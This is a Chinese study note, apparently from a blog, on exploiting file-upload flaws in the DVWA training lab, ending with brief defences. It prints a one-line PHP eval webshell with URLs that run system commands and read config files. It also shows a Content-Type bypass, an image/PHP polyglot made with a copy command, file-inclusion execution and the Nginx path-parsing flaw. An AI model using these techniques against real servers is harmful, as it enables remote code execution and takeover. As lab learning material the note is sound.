1. 程式人生 > >文件上傳-筆記

文件上傳-筆記

ini ner 圖片文件 3-9 pos -i http href 本地文件

網站常見功能,例如:上傳頭像 LOW 技術分享 上傳成功phpinfo.php可訪問執行 http://192.168.3.88/dvwa/hackable/uploads/phpinfo.php 漏洞利用:以PHP為例,可上傳一句話webshell cmd.php <?php @eval($_GET[‘cmd‘]); ?> 可用來執行各種php函數、命令。例如: http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=phpinfo(); http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(dir); http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(‘type c:\\phpstudy\\www\\dvwa\\php.ini‘); medium.
上傳非圖片文件時通過改包修改發送的post請求包中的 Content-Type: image/jpeg 即可 high 我們嘗試後發現服務器會對我們上傳的文件的文件後綴、文件類型、文件內容進行驗證。 使用dos命令制作內含圖,把我們想要執行的文件與正常的圖片合並。 copy test.jpg/b+ phpinfo.txt/a phpinfo.jpg 利用本地文件包含漏洞進行調用執行 http://192.168.3.88/dvwa/vulnerabilities/fi/?page=file:///C:\phpStudy\WWW\DVWA\hackable\uploads\cmd.jpg 利用 Nginx解析漏洞 使用phpstudy模擬測試環境 查看php-ini配置文件中 cgi.fix_pathinfo=1 是否為1 如是則存在畸形解析 xxx.xxx/xxx.php 前一個文件存在的話會當成是php文件進行解析 防護: 對用戶上傳的圖片壓縮重新生成、文件重命名、存儲目錄權限設置、存儲目錄與網站分離

文件上傳-筆記